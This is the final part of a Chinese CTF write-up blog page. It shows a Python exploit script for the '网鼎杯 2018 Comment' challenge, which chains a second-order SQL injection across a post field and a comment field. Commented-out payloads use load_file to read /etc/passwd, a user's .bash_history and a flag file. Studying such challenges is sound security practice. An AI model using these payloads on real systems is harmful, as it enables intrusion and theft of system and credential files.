<span class="string">"zhangwei666"</span></span><br><span class="line">    &#125;</span><br><span class="line">    s.post(url + <span class="string">"/login.php"</span>, data=data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def write(payload):</span><br><span class="line">    ran_string = ran_str()</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">'title'</span>: ran_string,</span><br><span class="line">        <span class="string">'category'</span>: <span class="string">"',content=("</span>+payload+<span class="string">"),/*"</span>,</span><br><span class="line">        <span class="string">'content'</span>: <span class="string">'1'</span></span><br><span class="line">    &#125;</span><br><span class="line">    s.post(url + <span class="string">"/write_do.php?do=write"</span>, data=data)</span><br><span class="line">    <span class="built_in">return</span> ran_string</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def comment(id):</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">'content'</span>: <span class="string">"*/#"</span>,</span><br><span class="line">        <span class="string">'bo_id'</span>: id</span><br><span class="line">    &#125;</span><br><span class="line">    s.post(url + <span class="string">"/write_do.php?do=comment"</span>, data=data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">    <span class="comment"># 读取用户</span></span><br><span class="line">    <span class="comment">#  payload = "select (load_file('/etc/passwd'))"</span></span><br><span class="line">    <span class="comment"># 读取用户目录下的操作历史</span></span><br><span class="line">    <span class="comment"># payload = "select (load_file('/home/www/.bash_history'))"</span></span><br><span class="line">    <span class="comment"># 从操作历史中知道了这么个文件</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># payload = "select (load_file('/tmp/html/.DS_Store'))"</span></span><br><span class="line">    <span class="comment">#  payload = "select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    login()</span><br><span class="line">    ran_string = write(payload)</span><br><span class="line">    result = re.search(<span class="string">"&lt;tr&gt;&lt;td&gt;.*&lt;/td&gt;&lt;td class='AutoNewline'&gt;.*&lt;/td&gt;&lt;td class='AutoNewline'&gt;"</span>+ran_string+<span class="string">"&lt;/td&gt;"</span>, s.get(url).text)</span><br><span class="line">    id = str(result.group(0).split(<span class="string">'&lt;/td&gt;'</span>)[0][8:])</span><br><span class="line">    comment(id)</span><br><span class="line">    result = re.split(<span class="string">"&lt;p&gt;"</span>, s.get(url + <span class="string">"/comment.php?id="</span> + str(id)).text)[2]</span><br><span class="line">    content = result[:result.index(<span class="string">'&lt;/p&gt;'</span>)]</span><br><span class="line">    <span class="built_in">print</span>(content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/02/14/2019安洵杯刷题记录/" rel="next" title="2019安洵杯刷题记录">
                <i class="fa fa-chevron-left"></i> 2019安洵杯刷题记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">cop</p>
              <p class="site-description motion-element" itemprop="description">cop's blog</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Black-Watch-入群题"><span class="nav-number">1.</span> <span class="nav-text">Black Watch 入群题</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RCTF2015-EasySQL"><span class="nav-number">2.</span> <span class="nav-text">[RCTF2015]EasySQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#网鼎杯2018-Unfinish"><span class="nav-number">3.</span> <span class="nav-text">[网鼎杯2018]Unfinish</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#XDCTF-2015-filemanager"><span class="nav-number">4.</span> <span class="nav-text">[XDCTF 2015]filemanager</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#facebook-ctf-2019-product-manager"><span class="nav-number">5.</span> <span class="nav-text">facebook ctf 2019 product manager</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#网鼎杯-2018-Comment"><span class="nav-number">6.</span> <span class="nav-text">[网鼎杯 2018]Comment</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">cop</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  
    <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true}});</script></body>
</html>
